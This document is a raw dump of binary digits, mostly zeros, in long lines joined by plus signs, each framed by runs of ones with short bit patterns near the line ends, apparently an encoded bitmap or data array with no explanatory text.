00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101111110001101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000000000000000000000000000000000001101101010100110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101101011100101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000011000110101100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000110011010001111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000001100111000100100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101001011101001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011110000110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 